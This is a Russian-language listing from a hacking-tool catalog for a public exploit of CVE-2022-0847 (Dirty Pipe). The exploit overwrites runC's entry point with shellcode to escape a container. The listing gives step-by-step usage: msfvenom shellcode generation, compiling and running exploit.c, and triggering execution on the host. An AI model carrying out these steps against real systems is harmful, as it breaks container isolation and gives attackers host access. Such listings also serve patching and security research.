Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-0847-container-escape — Простой эксплойт, который использует dirtypipe для внедрения шеллкода в точку входа runC с целью реализации побега из контейнера. | Kitploit
Инструменты/GitHubGitHub/jlsakuya/cve-2022-0847-container-escape
Повышение привилегийГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодПобег из Контейнера
GitHubjlsakuya/cve-2022-0847-container-escape

CVE-2022-0847-container-escape

Простой эксплойт, который использует dirtypipe для внедрения шеллкода в точку входа runC с целью реализации побега из контейнера.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2143 лет назадЕщё не проверено

CVE-2022-0847

Простой эксплойт, использующий dirtypipe для внедрения shellcode в точку входа runC, чтобы реализовать побег из контейнера.

Использование

Создайте base64-закодированный shellcode с помощью msf:

root@kitploit:~
$ msfvenom -p linux/x64/exec CMD="<command>" -f base64

Скомпилируйте и запустите в контейнере. Перезаписанное имя файла — это бинарный файл, который runC выполнит в контейнере (например, /bin/sh):

root@kitploit:~
$ gcc exploit.c -o exploit
$ ./exploit <overwritten filename> <base64 shellcode>

Запустите эксплойт и shellcode вне контейнера, как в CVE-2019-5736.

Ссылки

  • Выход из Docker через runC – Объяснение CVE-2019-5736
  • Использование уязвимости Dirty Pipe для побега из контейнеров
Скачать инструмент